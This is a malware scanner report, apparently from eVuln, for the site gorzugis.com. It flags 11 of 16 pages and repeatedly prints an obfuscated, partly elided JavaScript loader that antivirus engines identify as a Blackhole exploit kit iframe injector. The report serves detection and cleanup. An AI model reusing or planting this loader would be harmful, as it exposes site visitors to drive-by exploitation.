Malware Scanner report for gorzugis.com

Malicious/Suspicious/Total urls checked: 11/0/16

11 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/1

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.gorzugis.com/	200 OK Content-Length: 13456 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?feed=rss2	200 OK Content-Length: 5547 Content-Type: text/xml	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/test404page.js	404 Not Found Content-Length: 1549 Content-Type: text/html	clean
http://www.gorzugis.com/?page_id=504	200 OK Content-Length: 14269 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/wp-includes/js/comment-reply.js?ver=20090102	200 OK Content-Length: 786 Content-Type: application/x-javascript	clean
http://www.gorzugis.com/?page_id=459	200 OK Content-Length: 14518 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?page_id=306	200 OK Content-Length: 18959 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?page_id=25	200 OK Content-Length: 17410 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?page_id=93	200 OK Content-Length: 15196 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?page_id=78	200 OK Content-Length: 34349 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?page_id=94	200 OK Content-Length: 14471 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/wp-admin	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Oct 2014 05:00:38 GMT Location: http://www.gorzugis.com/wp-admin/ Server: Microsoft-IIS/7.0 Content-Length: 156 Content-Type: text/html; charset=UTF-8 X-Powered-By: ASP.NET	clean
http://www.gorzugis.com/wp-admin/	200 OK Content-Length: 0 Content-Type: text/html	clean
http://www.gorzugis.com/?attachment_id=49	200 OK Content-Length: 13622 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/?attachment_id=116	200 OK Content-Length: 13622 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:64:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:64:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6 ... 3366 bytes are skipped ...65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:64:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1388!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.49 Avast JS:Decode-BDD [Trj] Ikarus Virus.JS.Exploit Comodo Exploit.JS.Expack.G DrWeb JS.IFrame.500 Microsoft Trojan:JS/BlacoleRef.DD AVG JS/Exploit Norman Kryptik.CCLX
http://www.gorzugis.com/wp-content/uploads/2009/07/garypnunn0001.jpg	200 OK Content-Length: 201900 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gorzugis.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: gorzugis.com
Referer: http://www.google.com/search?q=gorzugis.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gorzugis.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://gorzugis.com/

Result: gorzugis.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for gorzugis.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools